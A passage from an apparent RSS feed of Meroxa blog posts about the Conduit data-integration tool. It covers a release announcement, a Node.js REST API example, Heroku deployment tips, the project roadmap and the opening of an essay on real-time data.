&lt;h3&gt;Bringing Developer Experience to Real-Time&lt;/h3&gt;
&lt;p&gt;Infrastructure should be there to support the developer and what they’re trying to accomplish, not the other way around. A lot of the emphasis on real-time architectures is placed on the infrastructure itself without regard to how developers have to code against these new paradigms. This is why real-time data apps have only been available to large organizations that have dedicated teams to develop against the paradigm. Hence, why we built Turbine. But don’t take our word for it:&lt;/p&gt;
&lt;p&gt;***Calvin French-Owen (Co-Founder and former CTO @ Segment):***We processed 1m+ events/second at Segment, so we built a ton of tooling to make processing data both simple and correct. We never open-sourced them, so I’m glad to see Meroxa making it available to the world with Turbine. Simple,&lt;em&gt;and&lt;/em&gt; performant.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Fredrik Björk (Co-Founder and CEO @ Grafbase):&lt;/strong&gt;&lt;/em&gt; Finally a code-first approach to real-time applications that lets developers focus on shipping code over infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rob Malnati (COO @ thatDot):&lt;/strong&gt; thatDot specializes in detecting complex relationships in real-time data via Quine, our open-source streaming graph processor. Turbine &amp;#x26; Meroxa makes it almost trivial for any developer to bring these new capabilities to their applications by moving data with ease so that real-time can truly be the default.&lt;/p&gt;
&lt;h3&gt;Feedback &amp;#x26; Learn More&lt;/h3&gt;
&lt;p&gt;We’ve only scratched the surface of what’s possible with data apps. During this beta period, we want to make sure we make Turbine and the Meroxa platform as reliable as possible before calling them generally available. Our promise is to be open and transparent about the current state of these solutions and build in concert with your feedback. For an in-depth look, checkout out the&lt;a href=&quot;https://docs.meroxa.com/&quot;&gt;documentation&lt;/a&gt;. If you have any questions or comments, feel free to connect with us on&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt;, or email us at&lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We’re so excited to share this next step in our journey and remove all the barriers to building real-time data applications.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.2: Making Connectors a Reality]]></title><description><![CDATA[In this release, Conduit now has an official SDK that will allow developers to build connectors for any data store.]]></description><link>https://meroxa.com/blog/conduit-0.2-making-connectors-a-reality</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.2-making-connectors-a-reality</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 05 Apr 2022 16:22:00 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.2 is here! A data movement tool is only as good as the number of systems it can support. We’ve all seen large production environments that have many different data stores from the standard relational databases, like PostgreSQL and MySQL, to event monitoring systems, like Prometheus, and everything in between. For this reason, being able to build connectors to meet the needs of your production environments and data stores is critical. In this release, Conduit now has an official SDK that will allow developers to build connectors for any data store.&lt;/p&gt;
&lt;p&gt;The second problem that this release sets to tackle is helping developers migrate from legacy systems to Conduit. Swapping out a critical piece of infrastructure is something that isn’t taken lightly. Systems are usually swapped out in pieces to understand the performance characteristics to help minimize downtime and minimize impact to downstream systems. Conduit 0.2 ships with the ability to leverage your current Kafka Connect connectors. This will enable you to use your current Kafka Connect connectors while using Conduit under the hood. The benefit is you can transition to an official Conduit connector on a timeline that works for you.&lt;/p&gt;
&lt;h3&gt;A Simple Connector Lifecycle&lt;/h3&gt;
&lt;p&gt;Building your own connector starts with the&lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;Conduit Connector SDK&lt;/a&gt; and deciding on whether you need your connector to pull data from a data source, push data to a data source, or possibly both. One of the design goals of the SDK was to make the implementation of connectors as simple and painless as possible. For example, let’s assume you want to build a connector that subscribed to a channel in Redis. The Redis connector would only need to implement four functions to be full-featured. Each function has a purpose in the connector lifecycle.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/0_81Ag8zORuCuTNxKN.png&quot; alt=&quot;0_81Ag8zORuCuTNxKN&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit Connector Lifecycle&lt;/p&gt;
&lt;p&gt;That’s it! With these four methods, a connector can be created and you can start moving data between any of the other Conduit connectors. For more details, make sure to checkout&lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/architecture-decision-records/20220121-conduit-plugin-architecture.md#conduit-plugin-sdk&quot;&gt;the ADR&lt;/a&gt; for the system on GitHub.&lt;/p&gt;
&lt;h3&gt;Easing the Transition from Kafka Connect&lt;/h3&gt;
&lt;p&gt;Changing backends when you’re dealing with high-velocity data has two challenges. The first is performing a migration while data is still being produced by upstream systems and the second is subtle changes in connector behaviors between the legacy system and the new one. To avoid these challenges, Conduit allows the operator to change the underlying system without having to worry about changes in connector behavior. This allows you to make the migration and preserve the investment you may have made in building custom Kafka Connect connectors. This allows operators to explore the benefits of using Conduit in their staging and production environments without having to get the entire engineering team involved to make changes to upstream or downstream systems. It’s a win-win for all!&lt;/p&gt;
&lt;p&gt;To get started, all you need to do is download the Kafka Connect package you want to use for your datastore and point Conduit to it. All of the settings you would have needed to pass to your Kafka Connect connector can pass through via the Conduit setup.&lt;/p&gt;
&lt;p&gt;Let’s assume Conduit is set up on your machine using the standard setup and you already have an empty pipeline ready to go:&lt;a href=&quot;https://gist.github.com/neovintage/80d7d4aa198f453803f988b33d86685b&quot;&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/1_RFKFnZ6iwQoLR3ty5_fPvw.png&quot; alt=&quot;1_RFKFnZ6iwQoLR3ty5_fPvw&quot;&gt;&lt;/a&gt;That’s a lot of settings! In the example above, the keys that start with `wrapper.*` are specific to the Conduit setup. The rest of the settings are for the Kafka Connect connector. Any setting name that you would have used in Kafka Connect will pass through, no need to do anything different.&lt;/p&gt;
&lt;h3&gt;Check Out the Rest&lt;/h3&gt;
&lt;p&gt;Creating connectors represents only a portion of what we released for Conduit 0.2. For all of the changes, make sure to check out the changelog on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.2.0&quot;&gt;releases page&lt;/a&gt; for 0.2. Join us on &lt;a href=&quot;https://github.com/conduitio/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt; or &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; for any questions or feedback on where we’re taking Conduit.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Writing Data Integration Software with the Conduit REST API]]></title><description><![CDATA[Since Conduit ships as a tiny single binary, it functions as a powerful tool that allows you to efficiently move data from one place to another.]]></description><link>https://meroxa.com/blog/writing-data-integration-software-with-the-conduit-rest-api</link><guid isPermaLink="false">https://meroxa.com/blog/writing-data-integration-software-with-the-conduit-rest-api</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Thu, 24 Mar 2022 16:36:00 GMT</pubDate><content:encoded>&lt;p&gt;Today, software engineers have a lot of tools to move data from one place to another. &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;, our OSS data integration tool written in Go, includes an API that devs can use to programmatically build pipelines. Since Conduit ships as a tiny single binary, it functions as a powerful tool that allows you to efficiently move data from one place to another.&lt;/p&gt;
&lt;p&gt;Today, Conduit provides a&lt;a href=&quot;https://docs.conduit.io/api&quot;&gt;RESTful HTTP&lt;/a&gt; and&lt;a href=&quot;https://grpc.io/&quot;&gt;gRPC&lt;/a&gt; Pipeline APIs that allow you to perform behaviors such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Creating data pipelines&lt;/li&gt;
&lt;li&gt;Creating connectors (ex. PostgreSQL, Kafka, File, etc.)&lt;/li&gt;
&lt;li&gt;Starting/stopping pipelines&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These APIs allow you to fully manage the lifecycle of a pipeline from creation to tear down. Even though Conduit provides both of these interfaces, in the rest of the guide, the examples and use case will focus on the HTTP APIs.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/0_tMT1erip9pc-NnFY.png&quot; alt=&quot;0_tMT1erip9pc-NnFY&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Why is this important?&lt;/h3&gt;
&lt;p&gt;Having access to an API is important when writing software that moves data around and allows us to think differently about writing data integration software. Here are the three advantages:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Abstraction&lt;/strong&gt; — The software you write can focus on the task at hand rather than on the mechanics of moving data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automation&lt;/strong&gt; — Your code can fully automate the pipeline lifecycle. You can build tools to orchestrate data movement. All you need is the Conduit binary and an HTTP library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Language-Agnostic&lt;/strong&gt; — You can interface with the HTTP server from any programming language.&lt;/p&gt;
&lt;h3&gt;Creating a Pipeline using Node.js&lt;/h3&gt;
&lt;p&gt;For example, let’s say you wanted to build a new tool that moves data from PostgreSQL to a file. This could be the case for performing a data backup or downloading data for analysis. In this case, the tool’s job is to move data from one place to another.&lt;/p&gt;
&lt;p&gt;Now, there are many ways to approach this problem. But here, I’ll describe how we could approach this with Conduit. In this case, we can write a script that uses the HTTP API to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a new pipeline.&lt;/li&gt;
&lt;li&gt;Create a &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;PostgreSQL connector&lt;/a&gt; to query data from PostgreSQL.&lt;/li&gt;
&lt;li&gt;Create a File Connector to store the result in a file.&lt;/li&gt;
&lt;li&gt;Run the Pipeline.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Note: &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started&quot;&gt;Conduit does ship with a UI&lt;/a&gt; to give you an easy-to-use interface to build pipelines and is a great place to start. However, building the pipeline with code gives us the ability to review, commit, deploy this pipeline like the other critical components of our infrastructure. With Conduit, you can stop writing one-off scripts to move data.&lt;/p&gt;
&lt;p&gt;From a high level, here are the tasks our code needs to perform. To begin writing this, we need to:&lt;/p&gt;
&lt;p&gt;First, &lt;a href=&quot;https://www.conduit.io/docs/introduction/getting-started&quot;&gt;Start Conduit to get the REST API Server up and running&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/0_5zvZwcMqov6Rio4w.png&quot; alt=&quot;0_5zvZwcMqov6Rio4w&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the above graphic, you can see the HTTP server by default runs on port 8080 and the gRPC server runs on port 8084.&lt;/p&gt;
&lt;p&gt;Next, we can now use any generic HTTP client from any language to interact with the Conduit API. Here is an example using the Node.js&lt;a href=&quot;https://github.com/axios/axios&quot;&gt;Axios HTTP library&lt;/a&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;const axios = require(‘axios’);const POSTGRES_TABLE = ‘my_table’;const POSTGRES_URL = ‘postgres://user:password@host:port/database’;const CONDUIT_HOST = ‘&lt;a href=&quot;http://localhost:8080&amp;#x27;;//&quot;&gt;http://localhost:8080&apos;;//&lt;/a&gt; A function to call the Conduit APIasync function createConnector(config) {try {const pipeline = await axios.post(`${CONDUIT_HOST}/v1/connectors`, config);return pipeline.data;} catch (error) {console.log(error);throw Error(‘Could not create connector’);}}const main = async () =&gt; { // Connector Configuration// See more: &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;https://github.com/ConduitIO/conduit-connector-postgres&lt;/a&gt; const postgresConfig = {type: ‘TYPE_SOURCE’,plugin: `/pkg/plugins/pg/pg`,pipelineId: pipeline.id,config: {name: ‘pg’,settings: {table: POSTGRES_TABLE,url: POSTGRES_URL,cdc: ‘false’,},},}; const connector = await createConnector(postgresConfig);console.log(pipeline, connector);}main();&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;To dig in deeper, you can download and run a full example &lt;a href=&quot;https://github.com/anaptfox/movegres&quot;&gt;from Github&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;What’s Next:&lt;/h3&gt;
&lt;p&gt;I hope this is the foundation for your next big data project. Now it’s your turn to give this example a try for your own use case or try in another programming language.&lt;/p&gt;
&lt;p&gt;Here are some guides you can use to dig into Conduit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/guides/creating-a-pipeline-with-swagger-ui&quot;&gt;How to test Conduit’s REST API with Swagger UI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/guides/how-to-add-conduit-to-your-path&quot;&gt;How to add Conduit to your Path&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here are some ways you can connect with us:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chat with the Conduit team in the&lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Request features/ ask questions about Conduit in&lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Send bug reports to&lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;GitHub Issues&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Check out the&lt;a href=&quot;https://conduit-site.vercel.app/&quot;&gt;Conduit Documentation&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Show us love on&lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Deploying Conduit on Heroku]]></title><description><![CDATA[Conduit is a tool to move data around and Heroku is an application platform.]]></description><link>https://meroxa.com/blog/deploying-conduit-on-herokudeploying-conduit-on-heroku</link><guid isPermaLink="false">https://meroxa.com/blog/deploying-conduit-on-herokudeploying-conduit-on-heroku</guid><dc:creator><![CDATA[Lyric Hartley]]></dc:creator><pubDate>Thu, 10 Mar 2022 17:44:00 GMT</pubDate><content:encoded>&lt;p&gt;If you are not familiar with&lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt;, you can get the low down&lt;a href=&quot;/blog/why-conduit-an-evolutionary-leap-forward-for-real-time-data-integration&quot;&gt;here&lt;/a&gt;. If you don’t know about&lt;a href=&quot;https://www.heroku.com/&quot;&gt;Heroku&lt;/a&gt;either, you may be lost? No worries, I am here to help. The short version is Conduit is a tool to move data around and Heroku is an application platform. Ok, let’s get the two hitched up.&lt;/p&gt;
&lt;h3&gt;Intro&lt;/h3&gt;
&lt;p&gt;Why might you want to deploy Conduit on Heroku? Heroku provides an easy platform to get an application up and going. It has some free data resources like PostgreSQL as well. This gives you&lt;a href=&quot;https://devcenter.heroku.com/articles/free-dyno-hours&quot;&gt;free hosting&lt;/a&gt; and data for Conduit!&lt;/p&gt;
&lt;h3&gt;Methods of Deploy&lt;/h3&gt;
&lt;p&gt;At a high level, there are two options: deploy Conduit pre-built or build it on Heroku. The advantage of deploying the pre-built version is that dependencies will already be met. The downside is that you can’t change the build configuration. We will touch on why you may want to tweak the build configuration in the “Considerations” Section.&lt;/p&gt;
&lt;h3&gt;Docker&lt;/h3&gt;
&lt;p&gt;Using &lt;a href=&quot;https://devcenter.heroku.com/categories/deploying-with-docker&quot;&gt;Heroku’s Docker&lt;/a&gt; support makes deploying the latest &lt;a href=&quot;https://github.com/ConduitIO/conduit#docker&quot;&gt;Conduit to Heroku&lt;/a&gt; easy as it gathers your dependencies. Docker operates a little bit differently than regular Heroku deploys. You can look over the details &lt;a href=&quot;https://devcenter.heroku.com/articles/build-docker-images-heroku-yml&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can test this method via &lt;a href=&quot;https://github.com/ahamidi/conduit-on-heroku&quot;&gt;this repo&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Go lang Binary&lt;/h3&gt;
&lt;p&gt;Conduit provides a Go binary as part of each release. The latest can be found &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/latest&quot;&gt;here&lt;/a&gt;. To deploy a &lt;a href=&quot;https://go.dev/&quot;&gt;Go&lt;/a&gt; binary to Heroku you will need to give Heroku something to detect. For example, we use a package.json file to trick the build process in this repo.&lt;/p&gt;
&lt;p&gt;You can test this method via the button below, which is based on version 0.11 of Conduit.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://heroku.com/deploy?template=https://github.com/lyric-meroxa/conduit-button&quot;&gt;&lt;img src=&quot;https://miro.medium.com/max/298/1*hiUCsGXwe8dQlSe2phN1_Q.png&quot; alt=&quot;Deploy to Heroku&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When the deploy is done, you can click&lt;strong&gt;View&lt;/strong&gt; or&lt;strong&gt;Manage &gt; View&lt;/strong&gt; to open the app in the browser. You may need to change the base URL to land on the Admin UI.&lt;/p&gt;
&lt;p&gt;The base URL will be:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;https://[application-name].herokuapp.com/ui/pipelines&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ap6ZmnjdrysBc_RTcqCLVw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit UI&lt;/p&gt;
&lt;h3&gt;A Conduit GitHub Repo&lt;/h3&gt;
&lt;p&gt;You can deploy Conduit to Heroku using the&lt;a href=&quot;https://elements.heroku.com/buildpacks/heroku/heroku-buildpack-go&quot;&gt;Go buildpack&lt;/a&gt;. We provide a test version of this method via the button below. This version does not have the UI enabled for security reasons (see below). To learn more about building Conduit from source you can reference the&lt;a href=&quot;https://github.com/ConduitIO/conduit#build-from-source&quot;&gt;build instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://heroku.com/deploy?template=https://github.com/lyric-meroxa/conduit/tree/Heroku-button&quot;&gt;&lt;img src=&quot;https://miro.medium.com/max/298/1*hiUCsGXwe8dQlSe2phN1_Q.png&quot; alt=&quot;Deploy to Heroku&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Considerations&lt;/h3&gt;
&lt;h4&gt;Persisting of Configuration&lt;/h4&gt;
&lt;p&gt;By default, Conduit stores its configuration on the local disk in&lt;code class=&quot;language-text&quot;&gt;conduit.db&lt;/code&gt;. Heroku has an&lt;a href=&quot;https://devcenter.heroku.com/articles/active-storage-on-heroku#ephemeral-disk&quot;&gt;ephemeral file system&lt;/a&gt;. This means that you will lose your configuration when the file system is “reset” and that happens on every restart. The dynos are&lt;a href=&quot;https://devcenter.heroku.com/articles/dynos#automatic-dyno-restarts&quot;&gt;restarted every 24 hours&lt;/a&gt; and anytime there is a new “release” or deploy. You will want to add a&lt;a href=&quot;https://www.heroku.com/postgres&quot;&gt;Heroku PostgreSQL addon&lt;/a&gt; and use the option below as part of your start command to let Conduit know to store the configs in PostgreSQL.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;web: ./conduit -db.postgres.connection-string &lt;span class=&quot;token variable&quot;&gt;$DATABASE_URL&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can use this&lt;a href=&quot;https://github.com/lyric-meroxa/conduit-button/blob/main/Procfile&quot;&gt;Procfile&lt;/a&gt; as an example. The deploy buttons above include the addon and this option.&lt;/p&gt;
&lt;h4&gt;HTTP API Port binding&lt;/h4&gt;
&lt;p&gt;Heroku web apps&lt;a href=&quot;https://devcenter.heroku.com/articles/dynos#web-dynos&quot;&gt;bind&lt;/a&gt; to&lt;code class=&quot;language-text&quot;&gt;$PORT&lt;/code&gt; when they startup. By default, Conduit uses port 8080, which will not work. This will need to be set for Conduit via the following flag. Note the leading&lt;code class=&quot;language-text&quot;&gt;:&lt;/code&gt; .&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit &lt;span class=&quot;token parameter variable&quot;&gt;-http.address&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PORT&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;Conduit HTTP security&lt;/h4&gt;
&lt;p&gt;The Conduit UI does not currently have authentication in front of it. One option is to build Conduit without the UI (like in the Go repo button above). This would be better for production deploys. If you still want a UI, you have a couple of options.&lt;/p&gt;
&lt;p&gt;You can add a buildpack like the&lt;a href=&quot;https://elements.heroku.com/buildpacks/heroku/heroku-buildpack-nginx&quot;&gt;nginx buildpack&lt;/a&gt; and&lt;a href=&quot;https://docs.nginx.com/nginx/admin-guide/security-controls/configuring-http-basic-authentication/&quot;&gt;configure it&lt;/a&gt; to provide authentication. Or, in the Procfile you can set your&lt;a href=&quot;https://devcenter.heroku.com/articles/process-model&quot;&gt;process type&lt;/a&gt; to something other than&lt;code class=&quot;language-text&quot;&gt;web:&lt;/code&gt; e.g.&lt;code class=&quot;language-text&quot;&gt;worker:&lt;/code&gt; and it will not bind to a port connected to the public internet. As this may work well in Private Spaces (or using an&lt;a href=&quot;https://devcenter.heroku.com/articles/internal-routing&quot;&gt;internally routed&lt;/a&gt; dyno) it may not be viable in the Common runtime (e.g. free dyno).&lt;/p&gt;
&lt;h4&gt;gRPC API lack of support&lt;/h4&gt;
&lt;p&gt;gRPC requires HTTP/2. Heroku&lt;a href=&quot;https://devcenter.heroku.com/articles/http-routing#not-supported&quot;&gt;does not currently support HTTP/2&lt;/a&gt;. So, you will not be able to use the gRPC admin API.&lt;/p&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;Now that you have Conduit up and going, you can visit the&lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit.io&lt;/a&gt; or view the docs in the&lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;repo&lt;/a&gt;. And get started building Pipelines!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/docs/connectors/postgres/overview&quot;&gt;PostgreSQL Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/docs/connectors/kafka/overview&quot;&gt;Kafka Connector&lt;/a&gt; (may require a Private Space)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;Let us know if you have any issues!&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Now and Into the Future]]></title><description><![CDATA[The Conduit roadmap is meant to provide insight into the major bodies of work we want to achieve within any given release.]]></description><link>https://meroxa.com/blog/conduit-now-and-into-the-future</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-now-and-into-the-future</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 09 Mar 2022 17:49:00 GMT</pubDate><content:encoded>&lt;p&gt;Today, we’re excited to announce the&lt;a href=&quot;https://github.com/orgs/ConduitIO/projects/3/views/1&quot;&gt;public roadmap&lt;/a&gt; for&lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit&lt;/a&gt;, our open-source data integration tool. The Conduit team manages all features and bugs in GitHub Issues within the repo, but the sheer volume of issues can make it hard to decipher the overarching goal of a release. The Conduit roadmap is meant to provide insight into the major bodies of work we want to achieve within any given release. This will bring transparency to what’s being prioritized, why it’s being prioritized, and more importantly, when to expect it.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*2lX1dGsswTJI0Cr1&quot; alt=&quot;&quot;&gt;An essential factor in the execution of our roadmap is the release process. Conduit will follow a six-month cycle. This means we won’t delay a release for a feature. If a feature is slated to be in the next version, but we can’t complete it by the time the release goes out, it’ll go out in the following version. We feel release consistency is more important than features. The driving force behind this decision is the supportability of releases. The team is committed to supporting the last three versions of Conduit. Every version will be fully supported for a year and a half before it’s deprecated. Let’s walk through an example where we’re currently working on 0.6 and have already released version 0.2 through 0.5:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*odUGf6fDUWV3Z76v&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The roadmap will show what’s planned for the next two releases and a list of future features that illustrate the vision for Conduit. Any issues that you find within the Conduit repo tagged with `roadmap` are features and bugs that are “must-haves” for any given release. That doesn’t mean we won’t get other issues and bugs into a release. It just means the team will work on these items first. Also, if you do want to test any of these features before the official launch, you can check out the nightly releases to kick the tires on new functionality. Do note if you’re interested in contributing, we’ll make every effort to get your PR merged into the current release.&lt;/p&gt;
&lt;p&gt;We’re committed to working on Conduit in the open with the community. Significant changes to the roadmap or shifts in the timeline will be communicated via the&lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;Discussions&lt;/a&gt; section of the Conduit repository on GitHub.&lt;/p&gt;
&lt;h3&gt;Share your feedback and stay connected&lt;/h3&gt;
&lt;p&gt;If you have any questions, comments, or input on the direction of Conduit, please join us on the Conduit&lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;Discussions&lt;/a&gt; page or on&lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt;. If you’d rather share in private, you can also reach out to me directly at&lt;a href=&quot;mailto:rimas@meroxa.io&quot;&gt;rimas@meroxa.io&lt;/a&gt;. I’m looking forward to working with you on making streaming data work between your production data stores. 🎉🎉🎉🎉&lt;/p&gt;</content:encoded></item><item><title><![CDATA[“Real-time” is becoming the default expectation. What's holding it back?]]></title><description><![CDATA[The world is trending towards more rapid delivery of goods and services. We use the term “Real-time” to mean that it happens as close to “now” as possible.]]></description><link>https://meroxa.com/blog/real-time-is-becoming-the-default-expectation.-whats-holding-it-back</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-is-becoming-the-default-expectation.-whats-holding-it-back</guid><dc:creator><![CDATA[Lyric Hartley]]></dc:creator><pubDate>Fri, 25 Feb 2022 14:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The world keeps moving faster, trending towards more rapid delivery of goods, services, and ideas. We use the term “Real-time” to mean that it happens as close to “now” as possible. For ideas, the internet is an obvious multiplier and we can easily see how it enables information to spread at, well, close to the speed of light.&lt;/p&gt;
&lt;p&gt;A number of new technologies aim to accelerate this for goods and services as the&lt;strong&gt;expectations for “faster’’ continue to grow&lt;/strong&gt;. In PwC’s June 2021 Global Consumer Insights Survey, 87% of responding consumers ranked&lt;strong&gt;reliability&lt;/strong&gt; and&lt;strong&gt;fast delivery&lt;/strong&gt; as top concerns when shopping online. After reading that stat a few questions came to mind:&lt;/p&gt;
&lt;p&gt;What is at the core of those feelings?&lt;/p&gt;
&lt;p&gt;What should we be thinking about as the world trends towards “real-time” being the default expectation in all domains?&lt;/p&gt;
&lt;p&gt;What does this mean for businesses?&lt;/p&gt;
&lt;p&gt;Let’s tease this apart a bit.&lt;/p&gt;
&lt;h3&gt;Time is scarce and valuable&lt;/h3&gt;
&lt;p&gt;Time is finite, it keeps moving forward no matter what we think about it. As more things are required of us, the time consumed becomes more valuable. Time is one of our most scarce, non-renewable resources. We may be able to backfill some resources, but not time. We’re all getting pulled into this new speedy world of change whether we want to or not. Someone demands something speedy from you, you, in turn, require speedy results from someone else.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Scarcity increases value&lt;/strong&gt;and&lt;strong&gt;time is becoming increasingly scarce.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The thing that then begins to differentiate you from your competitor is &lt;strong&gt;how long it takes for the customer to get value&lt;/strong&gt; from what you offer.&lt;/p&gt;
&lt;p&gt;You can set yourself apart by showing that you &lt;strong&gt;value your customer’s time more than your competitors&lt;/strong&gt;. Showing them that you care.&lt;/p&gt;
&lt;p&gt;However, speed is only one part of the equation. &lt;strong&gt;It has to be accurate as well&lt;/strong&gt; or…well, it wastes to fix it. That is often more frustrating than the time “saved” on the front end. And it will certainly get reflected back to the image of the company.&lt;/p&gt;
&lt;h3&gt;Value the customer’s time&lt;/h3&gt;
&lt;p&gt;Businesses have historically focused on saving time&lt;em&gt;internally&lt;/em&gt;. Trying to make the business itself more efficient etc. However, today’s businesses have to focus on&lt;strong&gt;empathy for the customer&lt;/strong&gt; by saving them time. The companies that send customers the message that they&lt;strong&gt;don’t value their time, will lose&lt;/strong&gt;…unless they have a monopoly (looking at you DMV).&lt;/p&gt;
&lt;h3&gt;Customers expect fast and reliable&lt;/h3&gt;
